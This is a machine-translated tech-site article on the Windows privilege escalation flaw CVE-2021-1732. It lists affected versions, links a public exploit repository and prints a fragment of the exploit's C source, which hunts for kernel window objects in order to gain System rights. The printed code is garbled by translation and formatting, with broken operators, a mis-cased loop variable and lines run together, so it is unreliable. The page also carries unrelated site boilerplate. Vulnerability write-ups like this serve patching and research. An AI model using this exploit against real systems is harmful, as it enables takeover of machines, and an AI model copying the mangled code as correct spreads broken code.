In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-05 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
What this article shares with you is the analysis of how to analyze the Windows local privilege promotion vulnerability CVE-2021-1732. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it.
Brief introduction of vulnerabilities
On February 10, 2021, Microsoft fixed a Windows local privilege escalation vulnerability numbered CVE-2021-1732, which can be exploited by local attackers to escalate privileges to System, and EXP has been made public.
Scope of influence
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows Server, version 1909 (Server Core installation)
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1803 for ARM64-based Systems
Windows 10 Version 1803 for x64-based Systems
Affects almost all major Windows 10 systems
Loophole recurrence
The reproduction environment is Windows 10 Professional Edition 1903.
Use exp to elevate permissions directly to System
EXP
Thank you for the EXP source code provided by Master KaLendsi. The download address is as follows:
Https://github.com/KaLendsi/CVE-2021-1732-Exploit
Some of the EXP codes are as follows:
BOOL FindHMValidateHandle () {HMODULE hUser32 = LoadLibraryA ("user32.dll"); if (hUser32 = = NULL) {printf ("Failed to load user32"); return FALSE;} BYTE* pIsMenu = (BYTE*) GetProcAddress (hUser32, "IsMenu"); if (pIsMenu = = NULL) {printf ("Failed to find location of exported function 'IsMenu' within user32.dll\ n") Return FALSE;} unsigned int uiHMValidateHandleOffset = 0; for (unsigned int i = 0; I
< 0x1000; i++) { BYTE* test = pIsMenu + i; if (*test == 0xE8) { uiHMValidateHandleOffset = i + 1; break; } } if (uiHMValidateHandleOffset == 0) { printf("Failed to find offset of HMValidateHandle from location of 'IsMenu'\n"); return FALSE; } unsigned int addr = *(unsigned int *)(pIsMenu + uiHMValidateHandleOffset); unsigned int offset = ((unsigned int)pIsMenu - (unsigned int)hUser32) + addr; //The +11 is to skip the padding bytes as on Windows 10 these aren't nops g_pfnHmValidateHandle = (lHMValidateHandle)((ULONG_PTR)hUser32 + offset + 11); return TRUE;}HWND GuessHwnd(QWORD *pBaseAddress, DWORD dwRegionSize){ QWORD qwBaseAddressBak = *pBaseAddress; QWORD qwBaseAddress = *pBaseAddress; DWORD dwRegionSizeBak = dwRegionSize; HWND hwndMagicWindow = nullptr; do { while (*(WORD*)qwBaseAddress != g_nRandom&dwRegionSize >0) {qwBaseAddress + = 2; dwRegionSize-- } / / if (* (DWORD*) ((DWORD*) qwBaseAddress + (0x18 > > 2)-(0xc8 > > 2))! = 0x8000000) {qwBaseAddress = qwBaseAddress + 4; QWORD qwSub = qwBaseAddressBak-qwBaseAddress DwRegionSize = dwRegionSizeBak + qwSub;} hwndMagicWindow = (HWND) * (DWORD*) (qwBaseAddress-0xc8); if (hwndMagicWindow) {break;}} while (true); return hwndMagicWindow } the above is the analysis of how to analyze the Windows local privilege escalation vulnerability CVE-2021-1732. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.